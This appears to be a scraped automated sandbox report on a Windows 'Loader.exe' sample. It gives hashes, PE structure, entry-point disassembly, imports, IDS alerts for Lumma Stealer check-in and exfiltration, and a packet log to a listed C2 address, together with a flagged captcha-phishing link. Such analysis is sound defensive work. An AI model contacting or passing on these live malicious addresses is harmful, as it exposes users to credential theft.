                                                                                    172.67.145.201https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      volcanohushe.clickbas.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.71.155
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.48.1
                                                                                      AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.184.241
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.169.205
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.96.6
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.96.6
                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.169.205
                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.191.144
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.27.229
                                                                                      installer.msiGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.80.93
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.58.45
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.145.201
                                                                                      AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.145.201
                                                                                      No context
                                                                                      Process:C:\Users\user\Desktop\Loader.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15
                                                                                      Entropy (8bit):3.906890595608518
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:SXhRi75n:SC5
                                                                                      MD5:3A33AF4BC7DC9699EE324B91553C2B46
                                                                                      SHA1:4CCE2BF1011CA006FAAB23506A349173ACC40434
                                                                                      SHA-256:226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
                                                                                      SHA-512:960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:1.29548Enjoy!..
                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.614610454522393
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:Loader.exe
                                                                                      File size:540'160 bytes
                                                                                      MD5:245d1f68f4e8caffb294d206958761e5
                                                                                      SHA1:d80d3805309b53632aabb56a1a3284c1e8ba6c26
                                                                                      SHA256:397c3c9ce2aff57799b4620f05103733cc2489f91df6da545b5c1e5ac4350ebb
                                                                                      SHA512:973fa8759e30a9718518f6d106fb147b35f7c56c40c2092aa860d67a7a82dfd1b2f11cd45d929652e86498dfcc7e01e3a8726c0af513cc6cbf392cc98519612c
                                                                                      SSDEEP:12288:luB9du8NOZx84E5YoS7OJlnDYrPLPJgu4dgT6lYDfAmy/yqv/kheLk:u9du88Zx8VAeDgPLxZ4GO+y4heQ
                                                                                      TLSH:13B4E011B580C072DC63147798B6EBAA863EF9200F22AADFA7940D7ADF352D19731717
                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<..
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x40ef52
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows cui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67695A57 [Mon Dec 23 12:40:55 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:5cc7e689f2864a0a9a8589c00efad8df
                                                                                      Instruction
                                                                                      call 00007FF9E4BC8A0Ah
                                                                                      jmp 00007FF9E4BC8879h
                                                                                      mov ecx, dword ptr [00436840h]
                                                                                      push esi
                                                                                      push edi
                                                                                      mov edi, BB40E64Eh
                                                                                      mov esi, FFFF0000h
                                                                                      cmp ecx, edi
                                                                                      je 00007FF9E4BC8A06h
                                                                                      test esi, ecx
                                                                                      jne 00007FF9E4BC8A28h
                                                                                      call 00007FF9E4BC8A31h
                                                                                      mov ecx, eax
                                                                                      cmp ecx, edi
                                                                                      jne 00007FF9E4BC8A09h
                                                                                      mov ecx, BB40E64Fh
                                                                                      jmp 00007FF9E4BC8A10h
                                                                                      test esi, ecx
                                                                                      jne 00007FF9E4BC8A0Ch
                                                                                      or eax, 00004711h
                                                                                      shl eax, 10h
                                                                                      or ecx, eax
                                                                                      mov dword ptr [00436840h], ecx
                                                                                      not ecx
                                                                                      pop edi
                                                                                      mov dword ptr [00436880h], ecx
                                                                                      pop esi
                                                                                      ret
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 14h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      xorps xmm0, xmm0
                                                                                      push eax
                                                                                      movlpd qword ptr [ebp-0Ch], xmm0
                                                                                      call dword ptr [00434AC4h]
                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                      mov dword ptr [ebp-04h], eax
                                                                                      call dword ptr [00434A78h]
                                                                                      xor dword ptr [ebp-04h], eax
                                                                                      call dword ptr [00434A74h]
                                                                                      xor dword ptr [ebp-04h], eax
                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                      push eax
                                                                                      call dword ptr [00434B0Ch]
                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                      xor eax, ecx
                                                                                      leave
                                                                                      ret
                                                                                      mov eax, 00004000h
                                                                                      ret
                                                                                      push 00437E18h
                                                                                      call dword ptr [00434AE4h]
                                                                                      ret
                                                                                      mov al, 01h
                                                                                      ret
                                                                                      push 00030000h
                                                                                      push 00010000h
                                                                                      push 00000000h
                                                                                      call 00007FF9E4BD01EBh
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x348640x3c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3a0000x1d70.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x30d080x18.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d0080xc0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x34a0c0x16c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x2a52b0x2a600ca7697ad91eaacd837ed51179759a947False0.5367809734513275data6.539348053061756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x2c0000x9d7c0x9e00964f1e27d13bf05fbdae349f651c8112False0.4288221914556962data4.95389314063731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x360000x25e40x1600f9cffcfbe2a982ed0d73caf2c5c26405False0.40678267045454547data4.770466622070642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .tls0x390000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .reloc0x3a0000x1d700x1e00050a442cf25b388dea29342e31853d9fFalse0.7709635416666667data6.524650010128688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      .bss0x3c0000x4be000x4be00e6f22ba3cc87ac612cb16657017e76f9False1.0003249845551894data7.999371959704677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      DLLImport
                                                                                      KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                      USER32.dllDefWindowProcW
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-24T02:17:04.845791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708172.67.145.201443TCP
                                                                                      2024-12-24T02:17:05.854185+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649708172.67.145.201443TCP
                                                                                      2024-12-24T02:17:05.854185+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649708172.67.145.201443TCP
                                                                                      2024-12-24T02:17:07.080105+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709172.67.145.201443TCP
                                                                                      2024-12-24T02:17:07.871102+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649709172.67.145.201443TCP
                                                                                      2024-12-24T02:17:07.871102+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709172.67.145.201443TCP
                                                                                      2024-12-24T02:17:09.470936+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710172.67.145.201443TCP
                                                                                      2024-12-24T02:17:12.305800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712172.67.145.201443TCP
                                                                                      2024-12-24T02:17:15.429568+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649723172.67.145.201443TCP
                                                                                      2024-12-24T02:17:18.748829+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730172.67.145.201443TCP
                                                                                      2024-12-24T02:17:19.521214+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649730172.67.145.201443TCP
                                                                                      2024-12-24T02:17:21.891648+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649743172.67.145.201443TCP
                                                                                      2024-12-24T02:17:26.564441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649754172.67.145.201443TCP
                                                                                      2024-12-24T02:17:27.334990+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649754172.67.145.201443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 24, 2024 02:17:03.621469975 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:03.621511936 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:03.621583939 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:03.625793934 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:03.625809908 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:04.845710993 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:04.845791101 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:04.909502983 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:04.909523964 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:04.909878969 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:04.957793951 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.081316948 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.081316948 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.081433058 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:05.854080915 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:05.854187965 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:05.854253054 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.856393099 CET49708443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.856406927 CET44349708172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:05.866286039 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.866311073 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:05.866391897 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.866713047 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:05.866729021 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.079993010 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.080105066 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.081573009 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.081589937 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.081918955 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.086178064 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.086205006 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.086276054 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.871071100 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.871130943 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.871253967 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.871345997 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.871809006 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.871860027 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.871879101 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.873501062 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.873557091 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.873572111 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.879357100 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.879421949 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.879436016 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.887686014 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.887754917 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.887770891 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.943764925 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.943804979 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:07.989041090 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:07.991450071 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.035926104 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.063085079 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.066898108 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.066950083 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.066972971 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.067027092 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.067091942 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.067508936 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.067529917 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.067558050 CET49709443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.067573071 CET44349709172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.257098913 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.257142067 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:08.257227898 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.257570982 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:08.257580996 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:09.470782042 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:09.470936060 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:09.472242117 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:09.472249031 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:09.472562075 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:09.478351116 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:09.478506088 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:09.478533983 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:10.543795109 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:10.543889046 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:10.543939114 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:10.558837891 CET49710443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:10.558851957 CET44349710172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:11.091346025 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:11.091399908 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:11.091481924 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:11.091866016 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:11.091883898 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:12.305706978 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:12.305799961 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:12.307281971 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:12.307291985 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:12.307534933 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:12.312709093 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:12.312884092 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:12.312927961 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:12.313000917 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:12.355340004 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:13.544833899 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:13.544944048 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:13.544994116 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:13.546232939 CET49712443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:13.546250105 CET44349712172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:14.213356972 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:14.213399887 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:14.213489056 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:14.213891983 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:14.213901043 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:15.429491997 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:15.429568052 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:15.430779934 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:15.430788040 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:15.431036949 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:15.432377100 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:15.432560921 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:15.432590008 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:15.432653904 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:15.432662964 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:16.397047997 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:16.397178888 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:16.397255898 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:16.422259092 CET49723443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:16.422307014 CET44349723172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:17.534132004 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:17.534174919 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:17.534243107 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:17.534568071 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:17.534579992 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:18.748744965 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:18.748828888 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:18.750593901 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:18.750602961 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:18.750850916 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:18.752547979 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:18.752631903 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:18.752636909 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:19.521193027 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:19.521296024 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:19.521373987 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:19.618077993 CET49730443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:19.618114948 CET44349730172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:20.660115004 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:20.660162926 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:20.660300016 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:20.660670996 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:20.660687923 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.891585112 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.891648054 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.893668890 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.893678904 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.893909931 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.905814886 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.906673908 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.906719923 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.906917095 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.906950951 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907077074 CET49743443192.168.2.6172.67.145.201
